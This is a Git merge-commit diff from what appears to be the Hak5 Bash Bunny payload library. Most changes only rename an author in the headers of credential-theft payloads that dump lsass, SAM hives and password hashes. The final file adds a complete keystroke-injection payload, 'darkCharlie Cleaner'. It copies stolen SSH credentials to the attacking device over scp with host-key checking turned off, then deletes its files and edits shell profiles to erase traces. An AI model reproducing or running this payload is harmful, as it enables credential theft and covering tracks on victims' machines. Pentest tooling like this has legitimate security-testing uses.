Merge branch 'hak5:master' into master

hak5 · Sep 2, 2024 · a570463 · a570463
2 parents 5cfae30 + 36f116e
commit a570463
Show file tree

Hide file tree

Showing 63 changed files with 2,500 additions and 57 deletions.
diff --git a/README.md b/README.md
diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md
@@ -1,7 +1,7 @@
 # Title:         FireSnatcher
 # Description:   Copies Wifi Keys, and Firefox Password Databases
 # Author:        KarrotKak3
-# Props:         saintcrossbow & 0iphor13
+# Props:         saintcrossbow & 0i41E
 # Version:       1.0.2.0 (Work in Progress)
 # Category:      Credentials
 # Target:        Windows (Logged in) 

diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt
@@ -1,7 +1,7 @@
 # Title:         FireSnatcher
 # Description:   Copies Wifi Keys, and Firefox Password Databases
 # Author:        KarrotKak3
-# Props:         saintcrossbow & 0iphor13
+# Props:         saintcrossbow & 0i41E
 # Version:       1.0.2.0 (Work in Progress)
 # Category:      Credentials
 # Target:        Windows (Logged in) 

diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md
@@ -1,6 +1,6 @@
 **Title: HashDumpBunny**
 
-Author: 0iphor13
+Author: 0i41E
 
 Version: 1.0
 
@@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
 #
 Plug in BashBunny.
 Exfiltrate the out.txt file and try to crack the hashes.
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
diff --git a/payloads/library/credentials/HashDumpBunny/payload.txt b/payloads/library/credentials/HashDumpBunny/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         HashDumpBunny
 # Description:   Dump user hashes with this script, which was obfuscated with multiple layers.
-# Author:        0iphor13
+# Author:        0i41E
 # Version:       1.0
 # Category:      Credentials
 # Attackmodes:   HID, Storage

diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md
@@ -1,6 +1,6 @@
 **Title: MiniDumpBunny**
 
-Author: 0iphor13
+Author: 0i41E
 
 Version: 1.0
 
@@ -14,4 +14,4 @@ What is MiniDumpBunny?
 Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
 #
 Exfiltrate the .dmp file and read it with Mimikatz.
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         MiniDumpBunny
 # Description:   Dump lsass with this script, which was obfuscated with multiple layers.
-# Author:        0iphor13
+# Author:        0i41E
 # Version:       1.0
 # Category:      Credentials
 # Attackmodes:   HID, Storage

diff --git a/payloads/library/credentials/ProcDumpBunny/README.md b/payloads/library/credentials/ProcDumpBunny/README.md
@@ -1,6 +1,6 @@
 **Title: ProcDumpBunny**
 
-Author: 0iphor13
+Author: 0i41E
 
 Version: 1.0
 
@@ -12,10 +12,10 @@ What is ProcDumpBunny?
 **Instruction:**
 
 Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
 Place Bunny.exe in the same payload switch as your payload
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
 #
 Plug in BashBunny.
 Exfiltrate the out.dmp file and read it with Mimikatz.
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
diff --git a/payloads/library/credentials/ProcDumpBunny/payload.txt b/payloads/library/credentials/ProcDumpBunny/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         ProcDumpBunny
 # Description:   Dump lsass.exe with a renamed version of procdump
-# Author:        0iphor13
+# Author:        0i41E
 # Version:       1.0
 # Category:      Credentials
 # Attackmodes:   HID, Storage

diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md
@@ -1,6 +1,6 @@
 **Title: SamDumpBunny**
 
-<p>Author: 0iphor13<br>
+<p>Author: 0i41E<br>
 OS: Windows<br>
 Version: 1.0<br>
 
@@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
 
 	**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
 
-![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
+![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         SamDumpBunny
 # Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
-# Author:        0iphor13
+# Author:        0i41E
 # Version:       1.0
 # Category:      Credentials
 # Attackmodes:   HID, Storage

diff --git a/payloads/library/credentials/SessionBunny/README.md b/payloads/library/credentials/SessionBunny/README.md
@@ -1,6 +1,6 @@
 **Title: SessionBunny**
 
-Author: 0iphor13
+Author: 0i41E
 (Credit for SessionGopher: Brandon Arvanaghi)
 
 Version: 1.0
@@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
 #
 Plug in BashBunny.
 Wait for the script to finish and decide what you wanna do with the information gathered
-![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
+![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
diff --git a/payloads/library/credentials/SessionBunny/SessionBunny.ps1 b/payloads/library/credentials/SessionBunny/SessionBunny.ps1
@@ -43,7 +43,7 @@
           o
           o_       
          /  ".   SessionGopher
-       ,"  _-"      Bunny Edition (0iphor13)
+       ,"  _-"      Bunny Edition (0i41E)
      ,"   m m         
   ..+     )      Brandon Arvanaghi
      `m..m       @arvanaghi | arvanaghi.com

diff --git a/payloads/library/credentials/SessionBunny/payload.txt b/payloads/library/credentials/SessionBunny/payload.txt
@@ -1,7 +1,7 @@
 #!/bin/bash
 #
 # Title:         SessionBunny
-# Author:        0iphor13
+# Author:        0i41E
 # Version:       1.0
 # Category:      Credentials
 # Attackmodes:   HID, Storage

diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt
@@ -0,0 +1,74 @@
+#!/bin/bash
+
+# Title:     darkCharlie{Cleaner}
+# Author:    Michael Weinstein
+# Target:    Mac/Linux
+# Version:   0.1
+#
+# Get the ssh creds from our loot collection.
+# And clean up after
+#
+# White            |  Ready
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+    ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+LOOT=/root/udisk/loot/darkCharlie
+mkdir -p $LOOT
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+    RUN OSX terminal
+else
+    RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json  #nice hiding of known host info
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING hak5bunny
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+if [ "$mac" = true ]
+then
+    QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile   #macs really seem to hate it when you sed in place, I think.
+    QUACK ENTER
+    QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
+else
+    QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
+fi
+QUACK ENTER
+QUACK DELAY 200
+if [ "$mac" = true ]
+then
+    QUACK DELAY 2000
+    QUACK GUI w
+else
+    QUACK STRING exit
+    QUACK DELAY 200
+    QUACK ENTER
+fi
+LED SUCCESS
+#See you, space cowboy...